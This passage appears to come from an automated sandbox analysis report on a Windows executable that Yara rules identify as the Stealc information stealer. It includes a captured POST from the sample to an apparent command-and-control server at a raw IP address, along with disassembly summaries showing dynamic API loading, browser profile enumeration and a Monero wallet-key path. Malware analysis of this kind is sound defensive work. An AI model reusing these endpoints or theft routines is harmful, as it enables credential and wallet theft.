6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Oct 1, 2024 16:50:13.637295008 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFBFHIEBKJKFHIEBFBAE--
Oct 1, 2024 16:50:14.354034901 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	10:49:54
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa0000
File size:	1'885'184 bytes
MD5 hash:	6BE29C7D09B8A432F22AD1AF2E94AB69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2040063346.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2238243370.000000000137E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	38

Executed Functions

Function 000B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01390600), ref: 000B98A1
GetProcAddress.KERNEL32(75900000,01390588), ref: 000B98BA
GetProcAddress.KERNEL32(75900000,01390798), ref: 000B98D2
GetProcAddress.KERNEL32(75900000,013907B0), ref: 000B98EA
GetProcAddress.KERNEL32(75900000,013905A0), ref: 000B9903
GetProcAddress.KERNEL32(75900000,013988C0), ref: 000B991B
GetProcAddress.KERNEL32(75900000,01386800), ref: 000B9933
GetProcAddress.KERNEL32(75900000,01386A00), ref: 000B994C
GetProcAddress.KERNEL32(75900000,01390618), ref: 000B9964
GetProcAddress.KERNEL32(75900000,013905B8), ref: 000B997C
GetProcAddress.KERNEL32(75900000,013905D0), ref: 000B9995
GetProcAddress.KERNEL32(75900000,013907C8), ref: 000B99AD
GetProcAddress.KERNEL32(75900000,01386700), ref: 000B99C5
GetProcAddress.KERNEL32(75900000,01390648), ref: 000B99DE
GetProcAddress.KERNEL32(75900000,013906D8), ref: 000B99F6
GetProcAddress.KERNEL32(75900000,01386900), ref: 000B9A0E
GetProcAddress.KERNEL32(75900000,013906F0), ref: 000B9A27
GetProcAddress.KERNEL32(75900000,01390888), ref: 000B9A3F
GetProcAddress.KERNEL32(75900000,01386920), ref: 000B9A57
GetProcAddress.KERNEL32(75900000,013908E8), ref: 000B9A70
GetProcAddress.KERNEL32(75900000,013866C0), ref: 000B9A88
LoadLibraryA.KERNEL32(01390900,?,000B6A00), ref: 000B9A9A
LoadLibraryA.KERNEL32(013908B8,?,000B6A00), ref: 000B9AAB
LoadLibraryA.KERNEL32(013908A0,?,000B6A00), ref: 000B9ABD
LoadLibraryA.KERNEL32(013908D0,?,000B6A00), ref: 000B9ACF
LoadLibraryA.KERNEL32(01390870,?,000B6A00), ref: 000B9AE0
GetProcAddress.KERNEL32(75070000,01390918), ref: 000B9B02
GetProcAddress.KERNEL32(75FD0000,01390858), ref: 000B9B23
GetProcAddress.KERNEL32(75FD0000,01398DF0), ref: 000B9B3B
GetProcAddress.KERNEL32(75A50000,01398CA0), ref: 000B9B5D
GetProcAddress.KERNEL32(74E50000,01386880), ref: 000B9B7E
GetProcAddress.KERNEL32(76E80000,013988E0), ref: 000B9B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 000B9BB6

Strings

NtQueryInformationProcess, xrefs: 000B9BAA

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: b53f6ea7f4908aa77b777198f0ab638b771b929a09f199dc4c5c882ec8deba52
Instruction ID: 9de5cb754efda989922800b59274866a9d912ec7daad61a56f8c0c6a38ee6752
Opcode Fuzzy Hash: b53f6ea7f4908aa77b777198f0ab638b771b929a09f199dc4c5c882ec8deba52
Instruction Fuzzy Hash: DFA14BB95812C09FD354EFA8FDDC95A7BF9F788301705851AA609CF264D739B881CB22

Function 000A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 000A460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000A479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A46AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000A4617

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: f4d189143b659273b291401872f4d0f15b3ba1fa024f4ba8b735c9c9cc36c1ef
Instruction ID: 20c96b82b98ad6be4117b831cc2193f0d6fc9fd548bf215fe3b76e3f4944510c
Opcode Fuzzy Hash: f4d189143b659273b291401872f4d0f15b3ba1fa024f4ba8b735c9c9cc36c1ef
Instruction Fuzzy Hash: F341036C7C16046E873CB7A5AC6EFDD77625FC2711B90504EFE0C6E282CAB0B940491A

Function 000ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

FindFirstFileA.KERNEL32(00000000,?,000C0B32,000C0B2B,00000000,?,?,?,000C13F4,000C0B2A), ref: 000ABEF5
StrCmpCA.SHLWAPI(?,000C13F8), ref: 000ABF4D
StrCmpCA.SHLWAPI(?,000C13FC), ref: 000ABF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 000AC7BF
FindClose.KERNEL32(000000FF), ref: 000AC7D1

Strings

Preferences, xrefs: 000AC11E
Google Chrome, xrefs: 000AC634
Brave, xrefs: 000AC102
\Brave\Preferences, xrefs: 000AC1DB

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: c7b894a6ff56347620b53d30e5d6c9a6723b57d2b4b2db97218d5ab243698528
Instruction ID: 16317227efd2a663a5c7313667984a92787a79cbf16c2e0ff09c2f7abb4e7506
Opcode Fuzzy Hash: c7b894a6ff56347620b53d30e5d6c9a6723b57d2b4b2db97218d5ab243698528
Instruction Fuzzy Hash: D6422572A10108BBDB14FBB0DD96EED737DAF55300F404558F50AA6192EF34AB49CBA2

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
__aulldiv.LIBCMT ref: 6C6536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C653773
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C65377E
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6537C4
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6537CB
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C653801
__aulldiv.LIBCMT ref: 6C653883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C653902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C653918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C65394C

Strings

QPC, xrefs: 6C6538FC
MOZ_TIMESTAMP_MODE, xrefs: 6C6535DB
GTC, xrefs: 6C653912
AuthcAMDenti, xrefs: 6C653946
GenuntelineI, xrefs: 6C653639

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

